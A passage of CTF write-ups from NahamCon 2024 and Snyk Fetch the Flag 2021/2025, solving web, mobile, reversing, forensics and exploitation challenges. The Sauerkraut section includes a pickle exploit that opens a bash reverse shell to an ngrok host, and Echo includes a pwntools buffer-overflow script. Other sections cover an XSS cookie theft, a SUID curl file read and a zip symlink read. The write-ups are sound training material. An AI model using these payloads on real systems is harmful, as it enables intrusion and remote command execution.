![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e3a9f5e4-e037-4d93-ad78-4acfc222e708)

I used this XSS payload to call back to my VPS:

```javascript

```

The page reloads right away, so we get hits from ourselves, but one of them is the admin:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/77ffc0b5-1647-45d9-8384-6c8004a36074)

Decoding that cookie with flask-unsign confirms it: the session belongs to user ID 1. We can now use this cookie and go to the standard `/admin` endpoint. This was an educated guess for me, but it can easily be discovered with some quick fuzzing.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b211d5c0-a700-4979-b8d9-cb5a601ba9d9)

flag{a538c88890d45a382e44dfd00296a99b}

PS: I'm not sure why this was classed as Medium when Marmalade was originally classed as Easy. Such is life.
-------------------------------------------------------------------------------- /Nahamcon-2024/Malware/Perfectly_Legit_Crypto_Casino.md: --------------------------------------------------------------------------------
## Perfectly Legit Crypto Casino

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4bb4e1f5-21bf-4016-8344-a4bb3daadaf5)

## Enumeration

The provided zip archive contains an Electron application:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c9f05b88-1381-40cb-862d-e7e1e658f210)

The source code for such applications can be found in the `app.asar` file:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/734dea58-6655-4119-8685-70dff39d1c47)

## Solution

We could have unpacked it (an asar archive is just a JSON header followed by the files concatenated), but simply running strings on it was sufficient to find this interesting line:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/37260e10-4177-44eb-a1b0-7c189f1c87ab)

After running
that in the terminal we get our flag: 22 | 23 | ```bash 24 | echo U2FsdGVkX18dLoy5VJmru0jW8cEVgMQS5JYhHSk8D369laaZ7d7nBJXslDqS4CFoqIfwoKGM6Urhmx079RXgIA== | openssl enc -aes-256-cbc -d -a -pass pass:infected 25 | ``` 26 | 27 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/99aa3739-dc9c-4e01-b670-b3d42a29c63e) 28 | 29 | `flag{6d0560223d733e5a6761476f8d23b4e3}` 30 | -------------------------------------------------------------------------------- /Nahamcon-2024/Misc/Not_Quite_The_Same.md: -------------------------------------------------------------------------------- 1 | ## Not Quite The Same 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/facc11d7-1a12-4f97-b14a-63d529613f19) 4 | 5 | ## Solution 6 | 7 | Based on the challenge description I immediately knew that this was about hash collision. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7b79f13f-1dd2-42e5-b5c9-c89c8cea0562) 10 | 11 | I knew of a good Github Repo that explains it very well, and includes very helpful examples. Including PNG images. 
https://github.com/corkami/collisions?tab=readme-ov-file#png

We can download the Sega and Nintendo PNGs:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5cf04a08-d5c1-48af-8884-e01c796e9268)

https://github.com/corkami/collisions/blob/master/examples/collision1.png
https://github.com/corkami/collisions/blob/master/examples/collision2.png

Upload them and get the flag:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b8f2e14a-feca-42c5-9402-879329d91839)

`flag{0800fc577294c34e0b28ad2839435945}`

--------------------------------------------------------------------------------
/Nahamcon-2024/Mobile/Buggy_Jumper_1.md:
--------------------------------------------------------------------------------

## Buggy Jumper 1

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7bef5be1-e407-45a7-a12c-23e54c90b745)

## Enumeration

While looking through the source code, we see multiple mentions of Godot and find this `flag.gdc` file.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8a4179b3-1c98-40cf-a962-cdd2ce9e209b)

But it seems to be a binary file, so we can't just read it. I asked ChatGPT for some clarification and it confirmed what I thought:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/68abb4ce-16b8-41ff-af02-0b22b7e4e53d)

We are dealing with Godot compiled code that we need to decompile.

## Solution

I found [this](https://github.com/bruvzg/gdsdecomp/releases) great precompiled tool on GitHub. I ran it, opened the `flag.gdc` and selected the latest bytecode version from the drop-down list:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d2be83f2-6b3f-4808-95c8-7fb6eaa55bef)

It decompiled it and now we can read it and get the flag:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0f5b4d82-3cd9-445e-9198-79ad84411bfa)

`flag{c2d5a0c9cae9857a3cfa662cd2869835}`

--------------------------------------------------------------------------------
/Nahamcon-2024/Mobile/Fly_Away_1.md:
--------------------------------------------------------------------------------

## Fly Away 1

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5cc20df8-48cd-427d-9a6c-27a45408ea2e)

## Solution

I used [this](https://appetize.io/) website, made an account with a 10 minute mail, loaded the app, tried to get a random lyric and found the flag in the first request it made that I could see in the Network log.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ef3e73ff-e940-4c13-9fd5-6907e19730de)

`flag{5949f48d478612cc78a32a71a6643922}`

--------------------------------------------------------------------------------
/Nahamcon-2024/Mobile/Kitty_Kitty_Bang_Bang.md:
--------------------------------------------------------------------------------

## Kitty Kitty Bang Bang

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ea47c22f-ddb6-4d03-a501-16327e4bd7fa)

## Enumeration

We can use `jadx` to decompile the provided apk file.
```bash
jadx -d ~/LAB/CTFs/NahamCon-2024/mobile/decompiled ~/LAB/CTFs/NahamCon-2024/mobile/com.nahamcon2024.kittykittybangbang.apk
```

From the source code we can see that it is outputting the flag into the log when tapping the screen:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/15184cfd-7d95-48ed-9b6b-2818d068d59a)

## Solution

So I used [this](https://appetize.io/) website, made an account with a 10 minute mail and turned ON the ADB Tunnel:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/adf9414a-08dd-4319-b957-ebaecd02851d)

Then locally, on my Kali machine, I started `adb logcat` grepping for the flag while clicking in the application to have the cat go bang a bunch of times.

```bash
adb logcat | grep -oE 'flag{.*}'
```

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d071114a-b623-436c-bd57-b3bce45eb4da)

After a few taps, we've found the flag:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9eaa0ffd-bb1a-4dd0-b74f-d49e0350cc5c)

`flag{f9028245dd46eedbf9b4f8861d73ae0f}`

--------------------------------------------------------------------------------
/Nahamcon-2024/Others/Basics.md:
--------------------------------------------------------------------------------

## Ring Cycle 1 - Basics

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3fbc2fee-ee13-4896-be1c-bd2f34b66e18)

## Enumeration

This challenge is the first one in the Ring Cycle challenge group, which is focused on reversing. I'm not much into reverse engineering, but I will often take a quick look at the low-hanging fruit.

I took the provided binary and uploaded it into [dogbolt](https://dogbolt.org/). I was too lazy to start up Ghidra for this, so I used this online web service. It's great for quick and small binaries.
We can already see some hex values that should be interesting:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/485ac12f-383d-4bce-8ca1-b172670e85fb)

The binary is expecting a passphrase from us and is comparing it with this value. I slapped the values into CyberChef, swapped endianness and hex decoded it:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4a8bc417-0366-4503-ad3f-855a4817d2a4)

```text
You are ready to start your safe cracking journey
```

## Solution

Gave the passphrase to the binary and got the flag:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b392e689-01fb-425e-b131-450ed23e91f8)

`flag{8562e979f1f754537a4e872cc20a73e8}`

--------------------------------------------------------------------------------
/Nahamcon-2024/Others/Indicium.md:
--------------------------------------------------------------------------------

## Indicium

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2ae8c9f4-853b-45e6-b671-bf14cbbe3120)

## Enumeration

We can easily recognize the string above as decimal encoding, so we can use [CyberChef](https://gchq.github.io/CyberChef/) to decode it:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7479fd03-ce0b-4b4e-98a6-0073cf4bd0e2)

Interestingly enough, we get another string that is not recognized by CyberChef: `gmbh|cc265ceg113b731ec768c9eg95b98175~`

However, we know the flag format needs to start with `flag`, but this one starts with `gmbh`. A keen eye would observe that `g` is the next letter after `f`, `m` is one letter after `l`, `b` is `a` + 1 and `h` is `g` + 1.

## Solution

If we apply the same logic to the entire string, we need to subtract 1 from every character, which we can easily do with Python.
```python
input_string = "gmbh|cc265ceg113b731ec768c9eg95b98175~"
transformed_string = ""

# Shift every character back by one code point (so `|` becomes `{` and `~` becomes `}`)
for char in input_string:
    transformed_string += chr(ord(char) - 1)

print(transformed_string)
```

We run it and get the flag.

`flag{bb154bdf002a620db657b8df84a87064}`

--------------------------------------------------------------------------------
/Nahamcon-2024/Others/Secret_Info.md:
--------------------------------------------------------------------------------

## Secret Info

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/dfa54ef7-0c3d-4fa5-94b7-42b6cce36f27)

## Enumeration

For this challenge, I built the Docker container using the provided source code. I logged into the administration panel to see where the file is located. Within the container, the file was publicly accessible from:

`/wp-content/uploads/2024/05/flag_secret_not_so_random_get_me_1337.png`

## Solution

Turns out that the same is valid for the challenge instance as well.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2df5d203-0bfd-49fb-a549-46d19185dff3)

`CTF{it_is_a_feature_by_core_xd}`

Note: I didn't understand the point of this challenge. It felt lazy and a missed opportunity to do something with a potentially cool WordPress plugin.

--------------------------------------------------------------------------------
/Nahamcon-2024/README.md:
--------------------------------------------------------------------------------

Nahamcon CTF delivered yet again on some great challenges. This year I played with my new team and we finished 55/3826 teams. That's the top 1.4% of the teams.
![nahamcon-2024](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3675bf4e-fb04-4157-99ad-c3cdb2dca2f7)

--------------------------------------------------------------------------------
/Nahamcon-2024/Rev/Locked_Box.md:
--------------------------------------------------------------------------------

## Locked Box

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a32b2766-4dd3-4f20-8e0a-eb617f212198)

## Solution

This challenge provides us a Makeself self-extracting bash script:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1e702c84-c3ac-44b2-b037-eb12c05a8860)

For such scripts, we can carve out the archive itself by skipping the first 715 lines, because we can see the bytes starting from line 716 (note that `tail -n +N` starts its output at line N, so check the number against where the binary data begins in your copy).

```bash
tail -n +715 thebox > archive
```

We confirm that we extracted the archive:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/09dcb410-6efd-4159-a827-1a97ab5b5e44)

The Python script from within the archive again contains a lot of flags:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2befbf04-778e-4e76-b391-8b8cb72705db)

But we just need to run it and it will print the flag:

`flag{3a50c5e41a1c3eee6dcddca9e04992e0}`

--------------------------------------------------------------------------------
/Nahamcon-2024/Rev/Whats_In_The_Box.md:
--------------------------------------------------------------------------------

## What's in the Box?
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/995b2656-72fd-4206-99c4-d46827c290e9)

## Solution

This challenge provides us a Makeself self-extracting bash script:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/cb72e5eb-617f-46e4-8384-ef91e0d401dc)

For such scripts, we can carve out the archive itself by skipping the first 715 lines, because we can see the bytes starting from line 716.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b7ccbc78-68eb-4743-863f-c9cd221b9e89)

```bash
tail -n +715 thebox > archive
```

And now we've taken it out manually. I had to do this because I kept getting Python-related errors and I was too lazy to resolve them. But we confirmed we extracted the archive:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/fd40f0e4-d6fd-4c67-b388-0491b63a3584)

The archive contains a Python script that starts with a lot of flags:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/55de4c1b-981a-445f-8c1d-68cae5819beb)

Then it ends with some more, but based on the code, we don't need to do anything other than run it and give it the hardcoded PIN code, and it should spit out the correct flag:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5c9c92aa-4714-4a96-aed8-0da34be485f3)

And we are correct:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/81cd2352-5713-4183-bd26-6c937c05b47e)

`flag{da0a0a25f5b35fbf99e3351997bfc4c8}`

--------------------------------------------------------------------------------
/SnykCon2021/All your flags are belong to root/Writeup.md:
--------------------------------------------------------------------------------

# All your flags are belong to root

When using curl to download linpeas, I noticed the group owner was changed to root instead of the regular user I was on the box with.

Checking the curl permissions, it looks like it has the SUID bit set. So I can use the file read from GTFOBins to read the flag, which is in the root directory:

```bash
LFILE=/flag
curl file://$LFILE
```

![image](https://user-images.githubusercontent.com/80063008/136172237-db11ec2a-5ffe-45e9-932b-bc990df52a6a.png)

SNYK{06b0e0ae4995af71335eda2882fecbc5008b01d95990982b439f3f8365fc07f7}

--------------------------------------------------------------------------------
/SnykCon2021/ElectronBuzz/Writeup.md:
--------------------------------------------------------------------------------

# ElectronBuzz

This was probably the unintended way of getting the flag because it was super easy; despite that, the challenge had very few solves. The expected way was probably to reverse engineer or decompile it.

We were given the option to download an installer either for macOS (.dmg), for Windows (.exe) or Linux (.deb).

I downloaded the .exe app and installed it in Windows.

Went to the location where it was installed and opened various files in Notepad++.

In the resources folder, there was a file called app.asar which contained the hardcoded flag:

![image](https://user-images.githubusercontent.com/80063008/136174633-5252cb01-a415-45f7-944f-75dae64f6153.png)

Flag: SNYK{07cd77795145aa60a36693f31fcf660c4f1ff2bae64e084fc1bbbc3affcc51eb}

--------------------------------------------------------------------------------
/SnykCon2021/Magician/Writeup.md:
--------------------------------------------------------------------------------

# Magician

The main page asks for a word, and the MD5 of that must match the one given. But there aren't 3 equal signs, so it's not mandatory for it to be exact.
![image](https://user-images.githubusercontent.com/80063008/136171626-c508eb84-d8ba-4cc2-a56f-41d50640adb8.png)

This reminded me of John Hammond's Magic Hashes: https://github.com/JohnHammond/ctf-katana#php

Magic hashes work because PHP's loose `==` comparison treats a string of the form `0e<digits>` as the number zero, so two such hashes compare as equal even though they differ.

I searched for a hash beginning with the first 3 characters of the given hash and found the word GGHMVOE.

![image](https://user-images.githubusercontent.com/80063008/136171710-10ee5845-0f36-4f76-b1c5-94b6b56cd20b.png)

Flag: SNYK{5fcde70181e9a9e3b26d014635e125a62899f337b84bb5ac8b7370efdf5bb506}

--------------------------------------------------------------------------------
/SnykCon2021/README.md:
--------------------------------------------------------------------------------

I participated in Snyk Fetch the Flag 2021 and ended up 57th out of 548 teams. That's top 10.4%. Not bad for 10 hours of staring at a screen.

Here are my writeups to the challenges I solved.

![image](https://user-images.githubusercontent.com/80063008/137868021-14582e3c-cc5d-4991-88ac-fced6e6d454a.png)
![image](https://user-images.githubusercontent.com/80063008/137868031-96f7d71e-1d8f-4ade-827b-53e082f361a6.png)

--------------------------------------------------------------------------------
/SnykCon2021/Robert Louis Stevenson/Writeup.md:
--------------------------------------------------------------------------------

# Robert Louis Stevenson

The challenge gives you a tar file to download.

The tar file in turn unarchives to several layers, and eventually the flag is found in here.
![image](https://user-images.githubusercontent.com/80063008/136172921-c116b054-401d-4014-9ffa-8bc9100f4870.png)

Flag: SNYK{23acc4111e1905ba1832cab7f1660284e3d1b91d3c2ead7bcec41ee8a4bd5ce9}

--------------------------------------------------------------------------------
/SnykCon2021/Sauerkraut/Writeup.md:
--------------------------------------------------------------------------------

# Sauerkraut

The page opened to two simple boxes:

![image](https://user-images.githubusercontent.com/80063008/136170679-cd9502f4-fbda-48cb-a3d2-973b85044d91.png)

Entering random text gets me an error:

![image](https://user-images.githubusercontent.com/80063008/136170774-6e12ee62-2b02-478d-b882-5d864fb91848.png)

While googling that, I found it is given by a Python module called pickle, which makes sense considering the title of the challenge references something else that's pickled. Googled around until I found a Python script to help: https://davidhamann.de/2020/04/05/exploiting-python-pickle/.

I modified it with my own payload to get a reverse shell. It gives me a base64 string that I put into the box, and while having ngrok and netcat listening, I got a reverse shell and then read the flag.
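The Sauerkraut bug is the application calling `pickle.loads` on attacker-controlled input, which lets `__reduce__` pick any importable callable. As an added example (not part of the original writeup or the challenge), here is the defender's side: a restricted unpickler that only resolves an allow-list of globals, and a static scan with `pickletools` that lists every global a pickle would import without loading it. The `_ReduceToSystem` class models the gadget from the writeup, and the benign dict and the allow-list are constructed for this example.

```python
import io
import os
import pickle
import pickletools

# Allow-list of the only globals the application needs to rebuild its objects.
# os.system (pickled as posix.system on Linux) is not on it, so a gadget that
# tries to REDUCE through it is rejected before anything runs.
ALLOWED_GLOBALS = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

# Opcodes that push a string which STACK_GLOBAL later consumes as (module, name).
_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
               "STRING", "SHORT_BINSTRING", "BINSTRING"}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler whose find_class only honours ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads that refuses unknown globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_safe(data: bytes) -> bool:
    """True if the pickle loads under the allow-list, False if it was rejected."""
    try:
        restricted_loads(data)
        return True
    except pickle.UnpicklingError:
        return False


def referenced_globals(data: bytes):
    """Static triage: every (module, name) the pickle would import, found by
    walking the opcode stream with pickletools, so nothing is executed.
    Simplified stack model: STACK_GLOBAL takes the two most recent string pushes."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in _STRING_OPS:
            strings.append(arg)
        elif op.name == "GLOBAL":            # protocol <= 3: "module name" text
            mod, name = arg.split(" ", 1)
            found.append((mod, name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:  # protocol >= 4
            found.append((strings[-2], strings[-1]))
    return found


def benign_sample() -> bytes:
    # Constructed sample of data an application might legitimately store.
    return pickle.dumps({"user": "alice", "items": [1, 2]})


class _ReduceToSystem:
    # Models the gadget from the writeup: __reduce__ pointing at os.system.
    # The command is never executed here because the unpickler rejects the global.
    def __reduce__(self):
        return (os.system, ('echo "this command is never executed"',))


def malicious_sample() -> bytes:
    return pickle.dumps(_ReduceToSystem())


if __name__ == "__main__":
    print("benign ->", restricted_loads(benign_sample()))
    print("malicious globals ->", referenced_globals(malicious_sample()))
    print("malicious accepted? ->", is_safe(malicious_sample()))
```

`referenced_globals` is a screening aid, not a sandbox: it does not track the memo, so a hand-crafted stream could hide a global behind `BINGET`. The allow-list in `find_class` is the control that actually stops execution, because `pickle` consults it before `REDUCE` can call anything.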
```python
import pickle
import base64
import os


class RCE:
    # __reduce__ tells pickle to call os.system with this command when the object is loaded
    def __reduce__(self):
        return (os.system, ('bash -c "bash -i >& /dev/tcp/2.tcp.ngrok.io/11352 0>&1"',))


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
```

Flag: SNYK{6854ecb17f51afdf2610f741dd07bd6099c616e4ab1a403eb14fa8639e1fb0af}

--------------------------------------------------------------------------------
/SnykCon2021/Zip Viewer/Writeup.md:
--------------------------------------------------------------------------------

# Zip Viewer

Trying to upload a JPEG image I get this error message. It is unzipping the file you give it and then you can open it.

![image](https://user-images.githubusercontent.com/80063008/136174211-9703e9d5-d697-4825-90d1-99d4ec35c431.png)

Tried multiple things, however creating a symlink is what worked: https://book.hacktricks.xyz/pentesting-web/file-upload#symlink

This is usually known as Zip Slip.

On my machine I first created a file that was symlinked to the root, by going back a few folders and then going for the flag, assuming it is in root as it was in other challenges in this CTF.

```bash
ln -s ../../../../../flag symflag.txt
```

Compressed the file using the --symlinks argument and then uploaded it. Clicked on the symlinked file and got the flag.
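The Zip Viewer bug is an extractor that recreates symlink entries and then serves whatever the link points at. As an added example (not part of the original writeup or the challenge code), this is the audit an upload handler should run before touching the filesystem: refuse symlink entries, absolute names and `..` traversal, and verify that every resolved path stays under the destination. The archives are constructed inside the block; the one carrying `symflag.txt` mirrors the entry the writeup builds with `zip --symlinks`.

```python
import io
import os
import stat
import tempfile
import zipfile


def audit_zip(data: bytes):
    """Return [(entry_name, reason)] for every entry an extractor must refuse."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            mode = info.external_attr >> 16  # Unix mode bits live in the high 16 bits
            if stat.S_ISLNK(mode):
                # The entry's data is the link target; an extractor that recreates
                # the link lets a later read escape the extraction directory.
                problems.append((name, "symlink"))
            elif name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
                problems.append((name, "absolute path"))
            elif ".." in name.replace("\\", "/").split("/"):
                problems.append((name, "path traversal"))
    return problems


def safe_extract(data: bytes, dest: str):
    """Extract only if the audit is clean and every resolved path stays under dest."""
    problems = audit_zip(data)
    if problems:
        raise ValueError(f"refusing archive: {problems}")
    root = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(root, name))
            if os.path.commonpath([root, target]) != root:  # defence in depth
                raise ValueError(f"{name} resolves outside {root}")
        zf.extractall(root)
        return sorted(zf.namelist())


def _build(entries) -> bytes:
    """Constructed sample archives. entries: (name, content, is_symlink)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content, is_symlink in entries:
            info = zipfile.ZipInfo(name)
            if is_symlink:
                info.external_attr = (stat.S_IFLNK | 0o777) << 16  # how zip marks a symlink
            zf.writestr(info, content)
    return buf.getvalue()


def symlink_zip() -> bytes:
    # Mirrors the writeup: a link named symflag.txt pointing far outside the tree.
    return _build([("symflag.txt", "../../../../../flag", True),
                   ("readme.txt", "harmless", False)])


def traversal_zip() -> bytes:
    return _build([("../../outside.txt", "escapes via ..", False)])


def clean_zip() -> bytes:
    return _build([("notes/a.txt", "fine", False), ("b.txt", "also fine", False)])


def extraction_refused(data: bytes) -> bool:
    """True if safe_extract rejects the archive (nothing is written)."""
    with tempfile.TemporaryDirectory() as d:
        try:
            safe_extract(data, d)
            return False
        except ValueError:
            return True


def demo_clean_extract():
    with tempfile.TemporaryDirectory() as d:
        return safe_extract(clean_zip(), d)
```

Python's own `zipfile.extractall` already strips absolute and `..` components and writes a symlink entry as a plain file containing the target, so the audit matters most when the extractor is something like `unzip` that recreates links; the `realpath` check in `safe_extract` is there for extractors that do not sanitise.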
```bash
zip --symlinks getflag.zip symflag.txt
```

![image](https://user-images.githubusercontent.com/80063008/136174276-f5c1f9a5-7151-4465-8a2a-e1fa444ea9fb.png)
![image](https://user-images.githubusercontent.com/80063008/136174285-fb8ea7a7-3336-4a40-b52a-52d1d7cb7eea.png)
![image](https://user-images.githubusercontent.com/80063008/136174294-66738ada-6423-492a-a4e2-e0449a30175d.png)

Flag: SNYK{d099a4c87b9ff06beabc0eb5ee186b93133fb2a9fff8d55582f932d1def8942c}

--------------------------------------------------------------------------------
/SnykCon2021/qrrr/Writeup.md:
--------------------------------------------------------------------------------

# qrrr

We are given a picture of a QR code.

![image](https://user-images.githubusercontent.com/80063008/136173535-423a8857-3945-4d68-b7d3-286db97e7188.png)

```text
└─$ zbarimg flag.png
QR-Code:5ff8d4e4958d8007a3897}
```

zbarimg sees the end of a potential flag given the curly brace.

Put the file into stegsolve.jar and navigated through all the layers.

Found another two QR codes:

![image](https://user-images.githubusercontent.com/80063008/136173554-055fb13f-1d4f-44ac-965a-d07b549d1325.png)

```text
└─$ zbarimg solved.bmp
QR-Code:12d99aa3a92f1abbb7d40786
```

And

![image](https://user-images.githubusercontent.com/80063008/136173577-f5eb1cae-2e2c-4c41-989b-277055a40915.png)

```text
└─$ zbarimg solved2.bmp
QR-Code:SNYK{6947bd4818ffc1768f2
```

Putting the three together we get the flag.
Flag: SNYK{6947bd4818ffc1768f212d99aa3a92f1abbb7d407865ff8d4e4958d8007a3897}

--------------------------------------------------------------------------------
/SnykCon2025/Binary_Exploitation/Echo.md:
--------------------------------------------------------------------------------

# Echo

![image](https://github.com/user-attachments/assets/738bbf96-b399-4093-9954-a7a0f7dd091d)

Attachment: [echo](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/echo)

## Writeup

I start by decompiling the binary in Ghidra and can see the main function with a 128-byte buffer:

![image](https://github.com/user-attachments/assets/63a1d38d-a92e-4d42-aeb6-b6d6f8ef5e2f)

There's also a win function that reads the flag:

![image](https://github.com/user-attachments/assets/f1ef9c51-b81a-4d49-b84a-edcf0691e635)

This is a standard ret2win type challenge which I solved with this script:

```python
from pwn import *

# Define the target binary
binary = './echo'
elf = ELF(binary)

prog = remote('challenge.ctf.games', 31084)

# Argument to pass to the binary: fill the 128-byte buffer plus the 8-byte saved frame pointer
payload = b'A' * 136
payload += p64(elf.symbols['win'])  # Overwrite the return address with the win function address

prog.recvline()
prog.sendline(payload)
prog.interactive()
```

![image](https://github.com/user-attachments/assets/c7d168c8-e926-45ef-aabf-a645817b65fe)

flag{4f4293237e37d06d733772a087299f17}

--------------------------------------------------------------------------------
/SnykCon2025/Forensics/ClickityClack.md:
--------------------------------------------------------------------------------

# ClickityClack

![image](https://github.com/user-attachments/assets/86b16f6a-aea9-4d24-bfde-d1e35b45d47e)

Attachment: [click.pcapng](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/click.pcapng)

## Writeup

I have solved multiple CTF challenges related to USB keyboard captures, so I used this very helpful [USB Keyboard Parser](https://github.com/5h4rrk/CTF-Usb_Keyboard_Parser): I just pass the pcap capture to it, it decodes all the keystrokes and I get the flag.

![image](https://github.com/user-attachments/assets/ffd0917c-4ca5-4829-9ca0-5829e0f280db)

flag{a3ce310e9a0dc53bc030847192e2f585}

--------------------------------------------------------------------------------
/SnykCon2025/Forensics/Free_Range_Packets.md:
--------------------------------------------------------------------------------

# Free Range Packets

![image](https://github.com/user-attachments/assets/63ae93ae-baa5-45f3-95f4-1a8552e83f42)

Attachment: [freeRangePackets.pcapng](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/freeRangePackets.pcapng)

## Writeup

Based on the challenge description, I knew I had to carve out the btl2cap field from the capture file. With tshark and some further grepping and cutting I can eventually cleanly get the flag out.

```bash
tshark -r freeRangePackets.pcapng -Y 'btl2cap.payload' -T fields -e btl2cap.payload 2>/dev/null|grep -v '09ff01065c'|cut -c 7-|cut -c 1-2|xxd -r -p
```

![image](https://github.com/user-attachments/assets/d65af82d-4199-45f5-baa1-e946bf8670d9)

flag{b5be72ab7e0254c056ffb57a0db124ce}

--------------------------------------------------------------------------------
/SnykCon2025/README.md:
--------------------------------------------------------------------------------

I participated solo in Snyk Fetch the Flag 2025 and ended up 21st out of 1201 teams. Technically, the first 1-19th teams were tied for 1st, 20th place is 2nd and I'm 3rd. Technically :grin:.
Here are my writeups to the challenges I solved.

![image](https://github.com/user-attachments/assets/324de0ce-3d39-4129-9196-8eaaeb7c9d86)

--------------------------------------------------------------------------------
/SnykCon2025/Rev/An_Offset_Among_Friends.md:
--------------------------------------------------------------------------------

# An Offset Among Friends

![image](https://github.com/user-attachments/assets/dc432c53-3950-4573-b8ff-bab7926bed2e)

Attachment: [an-offset](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/an-offset)

## Writeup

A quick decompile in [dogbolt](https://dogbolt.org/) and we can see what looks like a jumbled flag:

![image](https://github.com/user-attachments/assets/c0a1c737-10c7-4cde-a36d-f57f26fea2a8)

I recognize this as being rotated, but unlike ROT13, the special characters (the curly braces) are rotated as well, so we can use ROT47 from CyberChef:

![image](https://github.com/user-attachments/assets/ff5263da-ee8a-4adf-939d-139dc1891754)

https://gchq.github.io/CyberChef/#recipe=ROT47(-1)&input=Z21iaHxkNjU0MjY1OTM2NDJkMjJiODdiZmJiOTM5ZjU0OTE4ZH4&oeol=VT

flag{c54315482531c11a76aeaa828e43807c}

--------------------------------------------------------------------------------
/SnykCon2025/Rev/Either-Or.md:
--------------------------------------------------------------------------------

# Either Or

![image](https://github.com/user-attachments/assets/bdc998cf-a53e-443a-beab-99366b66fb82)

Attachment: [either-or](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/either-or)

## Writeup

I decompiled this quickly in [dogbolt](https://dogbolt.org/) and saw a string in the main function that I recognized to be rotated. Specifically ROT13.
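Indicium (the `-1` shift over every character), An Offset Among Friends (ROT47 with a shift of -1) and Either Or (ROT13) all come down to the same decoder: a rotation either over the letters only or over all 94 printable ASCII characters, which is what moves `|` to `{` and `~` to `}`. As an added example, not taken from the original writeups, this block implements both schemes and brute-forces the shift by looking for the `flag{` prefix. The two encoded strings from Indicium and An Offset Among Friends are the ones on the page; the ROT13 sample is constructed because Either Or does not print its string.

```python
def rot_letters(text: str, shift: int) -> str:
    """Caesar shift over A-Z and a-z only; other characters pass through (ROT13 = 13)."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def rot_printable(text: str, shift: int) -> str:
    """Rotate over the 94 printable ASCII characters '!'..'~' (ROT47 = 47, so the
    writeup's ROT47(-1) is shift 93 here)."""
    out = []
    for ch in text:
        if 33 <= ord(ch) <= 126:
            out.append(chr((ord(ch) - 33 + shift) % 94 + 33))
        else:
            out.append(ch)
    return "".join(out)


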